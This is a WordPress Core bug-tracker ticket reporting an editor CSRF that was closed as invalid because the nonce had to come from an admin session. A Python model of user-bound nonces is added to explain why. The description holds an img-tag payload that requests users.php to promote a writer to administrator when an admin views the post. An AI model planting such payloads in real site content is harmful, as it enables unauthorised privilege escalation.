WordPress.org

Make WordPress Core

Opened 6 years ago

Closed 6 years ago

#23004 closed defect (bug) (invalid)

Editor CSRF vulnerabilities discovered

Reported by: drssay
Owned by:
Milestone:
Priority: normal
Severity: normal
Version: 3.5
Component: Security
Keywords:
Focuses:
Cc:

Description

Reproduce

  1. Log in as a user with writer (or editor) privileges. -> example) user name "test", user id = 2
  2. Input the syntax below in the visual editor.
<img src="http://localhost/wp-admin/users.php?s=&_wponce=7258002722&_wp_http_referer=%2Fwp-admin%2Fusers.php%3Fupdate%3Dpromote&action=-1&new_role=administrator&changeit=%EB%B3%80%EA%B2%BD&paged=1&users%5B%5D=2&action2=-1" alt="" />

The user number is passed in the parameter users%5B%5D=2

  1. Log in as a user with administrator privileges. -> example) username "admin", user id 1
  2. User "admin" views the post written in step 2.
  3. User "admin" can check the xbox image.
  4. User "test" gains administrator privileges.

Attachments will be added

Change History (3)

#1 @TobiasBg
6 years ago

Where did you get the value "7258002722" for the _wpnonce parameter from?

Copy/paste from a session when you were logged in as admin? That doesn't count then.

And: Next time please do not report security vulnerabilities here, but by following the instructions at http://codex.wordpress.org/FAQ_Security
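
Added example, not part of the ticket and not WordPress's own code: a simplified Python model of a nonce bound to user, action and time, showing why the origin of the nonce value asked about in comment #1 decides whether a request like the one in the description is accepted. The secret, the action label, the lifetime and all function names are assumptions of this sketch.

```python
import hashlib
import hmac

# Constructed values for this model; none come from the ticket or a real site.
SECRET = b"constructed-site-secret"
NONCE_LIFE = 86400          # assumed nonce lifetime in seconds
TICK_LEN = NONCE_LIFE // 2  # a nonce is accepted in its own tick and the next one
ACTION = "change-role"      # hypothetical action label


def tick(now):
    """Coarse time bucket, so nonces expire without server-side storage."""
    return -(-int(now) // TICK_LEN)  # ceiling division


def _mac(t, action, user_id):
    msg = f"{t}|{action}|{user_id}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()[:10]


def create_nonce(action, user_id, now):
    """Nonce = truncated HMAC over (time tick, action, user id)."""
    return _mac(tick(now), action, user_id)


def verify_nonce(nonce, action, user_id, now):
    """Recompute for the requesting user; accept the current or previous tick."""
    for t in (tick(now), tick(now) - 1):
        if hmac.compare_digest(_mac(t, action, user_id).encode(), nonce.encode()):
            return True
    return False


def handle_role_change(session_user_id, submitted_nonce, now):
    """Hypothetical handler: the state change is refused unless the nonce was
    issued to the user whose session cookies arrived with the request."""
    if not verify_nonce(submitted_nonce, ACTION, session_user_id, now):
        return "rejected"
    return "role changed"


if __name__ == "__main__":
    now = 1_000_000  # constructed timestamp
    own = create_nonce(ACTION, 2, now)    # nonce issued to user "test" (id 2)
    admin = create_nonce(ACTION, 1, now)  # nonce issued to user "admin" (id 1)
    print("test's nonce, admin session:  ", handle_role_change(1, own, now))
    print("arbitrary value, admin session:", handle_role_change(1, "7258002722", now))
    print("admin's own nonce:             ", handle_role_change(1, admin, now))
```

In this model only a nonce issued to the administrator's own session passes, which is the copy/paste case comment #1 says does not count.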

#2 @drssay
6 years ago

Sorry, I see.
I send detail vulnerabilities to email address security_AT_wordpress.org

#3 @SergeyBiryukov
6 years ago

  • Component changed from General to Security
  • Milestone Awaiting Review deleted
  • Resolution set to invalid
  • Severity changed from critical to normal
  • Status changed from new to closed